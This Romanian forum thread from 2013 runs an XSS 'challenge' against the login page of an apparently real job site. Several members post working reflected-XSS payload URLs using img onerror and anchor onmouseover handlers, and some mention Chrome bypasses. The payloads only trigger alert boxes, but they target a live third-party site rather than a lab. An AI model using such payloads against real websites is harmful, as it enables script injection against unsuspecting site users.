XSS Challenge [medium-hard]

[florin_darck]

Target : Click me !

Level : medium.. maybe hard

Cerinte

- postati o imagine cenzurata

- nu dati hint-uri

Nu trebuie sa fiti logati. Cei care il rezolvati cu account nu se accepta

PS: Daca nu va descurcati va mai dau un hint pe parcurs.

Proof

Solvers

Simple

1.danyweb09 [pm cu rezolvarea corecta]

2.SilenTx0

3.Renegade

4.23.

5.daNNy.bv

Chrome

1.danyweb09

2.SilenTx0

3.VaD_SuNeTe

Challenge Closed

Edited June 4, 2013 by florin_darck

[dancezar]

View image: xss florin

//Edit cel care trebuia:http://postimg.org/image/fgt0b5c9t/full/

//Si bypass pentru chrome:http://s23.postimg.org/sqkqsa1ft/xss_bypass.png

Edited May 31, 2013 by danyweb09

[florin_darck]

Din pacate nu se accepta. In poza se vede. Nu suntem logati cand "sare" alertul

[SilenTx0]

Multumesc pentru challenge

[florin_darck]

Bine baieti. Cine il face sa mearga pe chrome in trec intr-un top separat

[SilenTx0]

Chrome :

[VaD_SuNeTe]

[Renegade]

[daNNy.bv]

ceva mai inedit http://www.careerjunction.co.za/my/account/login%22%3E%3Cimg%20src=x%20onerror=prompt%28%22daNNy.bv%22%29;%3E use firefox

[Renegade]

ceva mai inedit http://www.careerjunction.co.za/my/account/login%22%3E%3Cimg%20src=x%20onerror=prompt%28%22daNNy.bv%22%29;%3E use firefox

lol... asa il rezolvasem si eu prima data:

http://www.careerjunction.co.za/my/account/login"><a href=x onmouseover=confirm("Renegade")>XSS</a> Mozilla

si chiar l-am intrebat atunci pe florin_darck (flori_darck nu era sigur),si pe akkiliON acuma prin PM daca nu e path disclosure

Edited June 4, 2013 by Renegade

[yo20063]

http://www.careerjunction.co.za/my/account/login%3Ca%20href=y%20onmouseover=alert%28%27yo20063%27%29%3E%3Cfont%20color=%22red%22%3E%3Cblink%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ch1%20align=%22center%22%3E.%22%3EXSS%3C/blink%3E%3C/font%3E%3C/a%3E

[iRanhackteam]

http://i.imgur.com/JG9C1KH.png